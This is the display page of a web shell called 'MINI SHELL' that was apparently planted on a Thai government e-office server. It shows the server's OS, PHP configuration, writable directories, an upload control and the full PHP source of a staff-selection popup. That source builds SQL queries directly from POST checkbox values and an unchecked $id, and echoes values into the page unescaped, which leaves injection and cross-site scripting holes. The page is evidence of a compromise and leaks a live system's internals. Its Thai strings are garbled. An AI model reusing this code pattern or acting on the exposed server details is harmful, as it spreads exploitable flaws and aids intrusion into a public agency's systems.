MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/ecomplain/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/ecomplain/popup_select_org.php
<?
session_start();
//$bypass=1;

include("../../config/config.inc.php");
$table_groupmember = $profile_groupmember;
$table_staffgroup= $profile_staffgroup;
$db_mode="self";
//insert timeQuery
include("../../common/common_system.inc.php"); 
$ApplicationName="ecomplain"; 
$time_start = getmicrotime();  
//insert timeQuery
?>
<SCRIPT language="javascript">
function mOvr(src,clrOver){ 
if (!src.contains(event.fromElement)) src.bgColor = clrOver; 
} 

function mOut(src,clrIn){ 
if (!src.contains(event.toElement)) src.bgColor = clrIn; 
} 

function showEle(divname){
if(document.getElementById(divname).style.display == 'none'){
document.getElementById(divname).style.display = 'block';
} else {  
document.getElementById(divname).style.display = 'none';
}
}

function  checkEle(divname){
//alert(document.post.getting.length);
if(document.post.getting.selectedIndex== document.post.getting.length-1){
document.getElementById(divname).style.display = 'block';
}else
{
document.getElementById(divname).style.display = 'none';
}

}
function  openEle(divname){
document.getElementById(divname).style.display = 'block';
}
function  closeEle(divname){
document.getElementById(divname).style.display = 'none';
}

</SCRIPT>

<?

if ($_SERVER[REQUEST_METHOD] == "POST"){ 
//	print_r($_POST);

$xtype=""; $a=0;
if($_POST[checkbox]){
foreach ( $_POST[checkbox] as $num )
{
          $xtype.=$num.",";
		  if($a==0){  $select_code.="AND ( ";   }else{  $select_code.=" OR ";    }$a++;
		  $select_code.=" $table_staff.staffid =  $num";
}
$select_code.=")";

$sql_check_group="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
WHERE
$table_staff.username NOT LIKE  'admin_%'
AND $table_staff.username NOT LIKE  'root%'
$select_code

";


$show_sid="";$a=0;
$results = mysql_query($sql_check_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($rs_slist = mysql_fetch_assoc($results)){
 if($a>0){  $show_sid.=" , ";    }$a++;
$show_sid.=$rs_slist[prename].$rs_slist[staffname]." ".$rs_slist[staffsurname];
}
}
	$_SESSION[session_ap][$id] = $xtype;
//if($type=="get"){
?>
<SCRIPT language="javascript">
var xvar = new Array('<? echo substr($xtype,0,-1); ?>');
opener.document.post.sid.value=xvar;
opener.document.post.sid_show.value="<?=$show_sid?>";
//opener.document.post.activity_person.checked="true";
 window.close();
</SCRIPT>
<?
//}
if($type=="sendnone"){
?>
<SCRIPT language="javascript">
var xvar = new Array('<? echo substr($xtype,0,-1); ?>');
opener.document.post1.sid.value=xvar;
opener.document.post1.sid_show.value="<?=$show_sid?>";
//opener.document.post1.activity_person.checked="true";
 window.close();
</SCRIPT>
<?
}
 }else
 {
$sql_history="
SELECT
document.`status`,
document.time_rec,
document.owner,
doc_receive.status,
doc_receive.staff_id,
doc_receive.group_id,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
doc_receive
Inner Join document ON doc_receive.docid = document.id
Inner Join $table_staff ON doc_receive.staff_id = $table_staff.staffid
WHERE
document.id = $id
Group by $table_staff.staffid
";
$result = mysql_query($sql_history)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	while($hrs = mysql_fetch_assoc($result)){
		if(!$hrs[group_id]){
		$person_check[$hrs[staff_id]]=$hrs[staff_id];
		}
	}
 }
?>



<HTML>
<HEAD>
<TITLE> àÅ×Í¡ºØ¤¤Å</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=windows-874">
<SCRIPT type="text/javascript" src="dtree/dtree.js"></SCRIPT>
<SCRIPT src="../../common/functions.js" type="text/javascript" language="javascript"></SCRIPT>
<LINK href="../../common/style_menu.css" rel=StyleSheet type="text/css">
<LINK href="../../common/dtree.css" rel="StyleSheet" type="text/css"  />
<LINK href="../../common/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY bgcolor="#FFFFFF">
<FORM action="<?=$PHP_SELF?>?type=<?=$type?>&action=add" name="post" method="post" enctype="multipart/form-data" onSubmit="return check();">
<TABLE width="101%" border="0" align="right" cellpadding="10" cellspacing="0">
<TR>
<TD height="18">

<TABLE width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
	<TR>
		<TD><TABLE width="100%" border="0" cellspacing="1" cellpadding="1">
			<TR>
				<TD colspan="2" bgcolor="#CCCCCC"><TABLE width="100%" border="0" cellspacing="0" cellpadding="0">
						<TR>
							<TD align="left"><STRONG>ºØ¤¤Å</STRONG></TD>
							<TD align="right"><INPUT type="submit" name="Button" value="ºÑ¹·Ö¡¢éÍÁÙÅ" onClick="sendvalue();"></TD>
						</TR>
					</TABLE></TD>
			</TR>
<?
$check_c=explode(",",$_SESSION[session_ap][$id]);
foreach($check_c as $num => $val)
{
if($val) { $ch[$val]="on";}
}


$sql_groupmember="
SELECT
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
Inner Join $table_groupmember ON $table_groupmember.staffid = $table_staff.staffid
WHERE
$table_staff.username NOT LIKE  'admin_%'
AND $table_staff.username NOT LIKE  'root%'
";			
$result = mysql_query($sql_groupmember)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($rs_list = mysql_fetch_assoc($result)){
$list[$rs_list[gid]][$rs_list[staffid]]=$rs_list[prename].$rs_list[staffname]." ".$rs_list[staffsurname];

}
// echo "<pre>";
// print_r($list);	
			
			

$sql_group="
SELECT
$table_staff.staffid,
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname
FROM
$table_staff
WHERE
$table_staff.username NOT LIKE  'admin_%'
AND $table_staff.username NOT LIKE  'root%'
ORDER by $table_staff.staffid ASC
";
$result = mysql_query($sql_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($hrs = mysql_fetch_assoc($result)){
// if($list[$hrs[gid]]) {
?>			
			<TR>
				<TD align="left" valign="top">
					<INPUT type="checkbox" name="checkbox[<?=$hrs[staffid]?>]" value="<?=$hrs[staffid]?>" <? if(($ch[$hrs[staffid]]=="on")||($person_check[$hrs[staffid]])) {echo " checked ";} ?>>
					<?=$hrs[prename].$hrs[staffname]." ".$hrs[staffsurname]?></TD>
			</TR>
<? } // }?>
			<TR>
				<TD colspan="2"><INPUT name="id" type="hidden" id="id"  readonly="readonly" value="<?=$id?>"/></TD>
			</TR>
			<TR>
				<TD colspan="2">&nbsp;</TD>
			</TR>
		</TABLE></TD>
	</TR>
</TABLE></TD>
</TR>  
</TABLE>
</FORM>
</BODY>
</HTML><?
//insert timeQuery
 $time_end = getmicrotime();
  writetime2db($timestart,$timeend);
//insert timeQuery
?>

Anon7 - 2021